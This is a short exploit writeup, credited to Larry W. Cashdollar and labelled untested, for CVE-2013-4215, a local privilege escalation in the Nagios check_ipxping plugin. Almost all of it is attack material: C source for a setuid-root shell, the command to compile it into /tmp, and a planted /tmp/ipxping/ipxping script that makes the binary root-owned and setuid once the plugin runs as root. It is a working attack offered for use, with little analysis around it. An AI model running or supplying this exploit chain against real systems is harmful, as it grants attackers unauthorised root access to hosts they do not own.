/*
Larry W. Cashdollar
@_larry0
Untested exploit for https://bugzilla.redhat.com/show_bug.cgi?id=957482
CVE-2013-4215
*/


#include <stdio.h>
#include <unistd.h>
int
main (void)
{
  char *shell[2];
  shell[0] = "sh";
  shell[1] = NULL;
  setregid (0, 0);
  setreuid (0, 0);
  execve ("/bin/sh", shell, NULL);
  return(0);
}

gcc -o /tmp/r00t setuid.c

Create the following file:

larry@nagios:~$ cat /tmp/ipxping/ipxping
#!/bin/sh
chown root:root /tmp/r00t
chmod +s /tmp/r00t

Wait until the check_ipxping plugin is executed.  I suspect it needs to be executed as root
to create the raw icmp socket().